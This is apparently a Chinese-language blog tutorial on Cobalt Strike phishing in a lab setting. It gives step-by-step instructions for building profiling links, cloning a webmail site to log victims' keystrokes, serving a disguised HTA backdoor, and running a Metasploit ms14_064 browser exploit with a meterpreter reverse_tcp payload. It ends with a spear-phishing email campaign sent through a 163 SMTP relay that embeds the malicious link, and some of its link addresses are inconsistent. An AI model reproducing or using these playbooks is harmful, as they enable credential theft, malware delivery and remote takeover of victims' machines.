我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!!
文章目录
- 一、钓鱼攻击和鱼叉钓鱼简介
- 1、钓鱼攻击简介
- 2、钓鱼攻击模块:6个
- 3、鱼叉钓鱼简介
- 4、鱼叉钓鱼示例:邮件钓鱼
- 二、钓鱼攻击测试
- 1、测试环境
- 2、System Profiler(信息搜集)
- 3、Clone Site(克隆网站):获取键盘记录
- 4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话
- 5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话
- 三、鱼叉钓鱼测试
- 1、邮件钓鱼
一、钓鱼攻击和鱼叉钓鱼简介
1、钓鱼攻击简介
网络钓鱼是指诱导人们连接那些黑客已经锁定的目标。这种攻击方法的成功率很高,也非常常见。点击链接、打开表格或者连接其他一些文件都会感染病毒。一次简单的点击相当于为攻击者开启了一扇电子门,这样他就可以接触到你的内部弱点了。因为你已经同意他进入,他能够接触弱点,然后挖掘信息和授权连接。
2、钓鱼攻击模块:6个
(1)Manage(web服务管理): 对开启的web服务进行管理;
(2)Clone Site(克隆网站) : 可以记录受害者提交的数据;
(3)Host File(文件下载):提供一个本地文件下载;
(4)Scripted Web Delivery(脚本web传递): 基于Web的攻击测试脚本,自动生成可执行的payload ,通常用这个模块来生成powershell命令反弹shell;
(5)Signed Applet Attack(签名Applet攻击):启动一个Web服务以提供自签名Java Applet的运行环境;
(6)Smart Applet Attack(智能攻击) 自动检测Java版本并利用已知的exploits绕过security;
(7)System Profiler(信息搜集):用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。
//如下图所示:
3、鱼叉钓鱼简介
(1)鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧只针对特定目标进行攻击的网络钓鱼攻击。
(2)由于鱼叉式网络钓鱼锁定之对象并非一般个人,而是特定公司、组织之成员,故受窃之资讯已非一般网络钓鱼所窃取之个人资料,而是其他高度敏感性资料,如知识产权及商业机密。
4、鱼叉钓鱼示例:邮件钓鱼
//如下图所示:点击攻击下的邮件钓鱼进行鱼叉式钓鱼
二、钓鱼攻击测试
1、测试环境
2、System Profiler(信息搜集)
(1)CS生成信息收集的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击信息收集-->填写钓鱼的URL-->填写team server地址-->填写web端口-->填写重定向的地址(该重定向只是为了让受害者以为真的只是访问百度)
//如下图所示:调出信息收集模块
//如下图所示:在team server服务器上开启了一个80服务,该服务的地址是http://cs.clqwsn.xyz/baidu,该地址是钓鱼链接可以反弹系统信息给cs,还会自动的重定向到百度
//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/baidu
(2)cs上查看是否真的生成了钓鱼链接的服务:点击攻击-->点击钓鱼攻击-->点击web服务管理即可看到刚刚生成的服务
//如下图所示:
(3)当靶机访问http://cs.clqwsn.xyz:80/baidu
该链接,cs就会收集到靶机信息,而且靶机也会很快的跳到百度,一般很难被发现。
//如下图所示:靶机访问钓鱼链接后,紧接着发送信息给了cs,然后自己重定向到了百度
(4)cs上查看靶机的信息:点击视图-->点击应用信息-->查看收集到的靶机信息
//如下图所示:
3、Clone Site(克隆网站):获取键盘记录
(1)CS生成克隆网站的钓鱼链接:点击攻击-->点击钓鱼攻击-->点击克隆网站-->填写要克隆的网站-->填写本地team server的URI-->填写本地team server的地址-->选择80端口-->勾选开启键盘记录
//如下图所示:
//如下图所示:在team server上开启了一个80服务,该地址是http://cs.clqwsn.xyz/mail,该地址的网站是根据mail.tom.com克隆而来的,受害者点击访问该80的地址的时候可以记录受害者的键盘记录
//如下图所示:生成钓鱼链接http://cs.clqwsn.xyz:80/mail
(2)cs上检查是否开启了80服务
//如下图所示:成功开启了克隆网站
(3)靶机浏览器访问钓鱼链接,并填写账号信息
(4)CS上查看靶机的键盘记录:点击视图-->点击web日志-->查看到键盘记录
4、生成hta后门文件+文件下载(cs上传hta)+Clone Site(克隆网站):钓鱼攻击获取cs会话
(1)首先我们要生成一个hta后门文件到本地:新建监听器-->创建hta后门
//如下图所示:9527监听器
//如下图所示:hta后门绑定9527监听器
(2)其次我们要把这个hta后门文件通过文件下载模块,上传到靶机的80服务上:点击攻击-->点击钓鱼攻击-->点击文件下载-->上传hta后门文件
//如下图所示:调出文件下载模块
//如下图所示:把本地的hta后门上传到team server的80服务的update.hta
(3)cs上检查是否开启了80服务
(4)克隆网站的时候,Attack填写为hta的下载地址,然后靶机访问钓鱼链接的时候不仅仅只是访问了一个克隆网站的样子,还会下载到该hta后门(这个文件下载,是对受害者来说的;如果对cs来说其实是上传文件到自己的web服务器上,然后在供给受害者下载。)
(5)靶机访问钓鱼链接:不仅会显示克隆的网站,还会提示下载hta后门,只要运行了下载的后门文件,就会反弹会话到cs
//如下图所示:
(6)cs上查看上线的靶机:
5、MSF溢出代码+CS克隆网站:钓鱼攻击获取MSF会话
(1)MSF生成反弹会话的链接:http://47.x.x.x:9999/21HPgNXV7Ub6zz
use exploit/windows/browser/ms14_064_ole_code_execution
set srvhost [msf恶意链接的ip]
set SRVPORT [msf恶意链接的端口]
set payload windows/meterpreter/reverse_tcp
set lhost [msf的ip]
Set lport [msf监听的端口]
exploit
(2)CS克隆网站的时候,其中的Attack填写MSF的链接,此时生成的钓鱼链接http://cs.clqwsn.xyz:80/2
不仅仅是克隆的百度网站的样子,还可以反弹会话给MSF
(3)当受害人访问http://cs.clqwsn.xyz/2的时候, 就会加载http://47.x.x.x:9999/21HPgNXV7Ub6zz进行溢出攻击,从而反弹会话给MSF
//由于,该溢出攻击对靶机无效,所以图略
三、鱼叉钓鱼测试
1、邮件钓鱼
(1)自己的163邮箱开启POP3/SMTP代发功能:这个授权码是代理邮箱登录时候的密码
(2)设置目标qq邮箱:目标邮箱和名称之间必须是一个Tab键,虽然四个空格也可以解析,但是会报错
(3)从gmail谷歌邮箱收集邮件模板:点击显示原始邮件,另存为本地template.txt
(4)CS进入邮件钓鱼模块:点击攻击-->邮件钓鱼
(5)分析邮件钓鱼的各个模块
Targets:存有目标邮箱及收件人信息的文本文件
Template:邮件模板文件
Attachment:附件(这里没有用到)
Embed URL:填写url钓鱼链接, 可将邮件的内置链接替换掉。此处我填写了带有hta木马下载功能的克隆网站,也就是第三个实验中的钓鱼链接http://cs/clqwsn.xyz/1
Mail Server: 邮箱服务器相关信息,该服务器信息是代发邮件的服务器,这里使用的是163的邮箱
Bounce to:邮箱地址
(6)发送钓鱼邮件:这里我们让163邮箱代发邮件给qq邮箱,其中内嵌了第三个实验的钓鱼链接http://cs.clqwsn.xyz/r1,这个链接不仅可以看到克隆的百度网站,同时还会下载hta后门
//如下图所示:具体的配置
//如下图所示:上面图中设置代发邮件的163邮箱
(7)在点击发送之后,会显示如下视图,则163邮箱(代理邮箱服务器)会自动的给qq邮箱(受害者)发送一个内嵌了恶意链接的邮件
(8)登录受害者邮件,发现收到了新的邮件
(9)受害者打开邮件,并点击恶意链接,则会跳转http://cs.clqwsn.xyz/r1下载hta后门
(10)假如受害者执行了后门文件,cs会上线受害者主机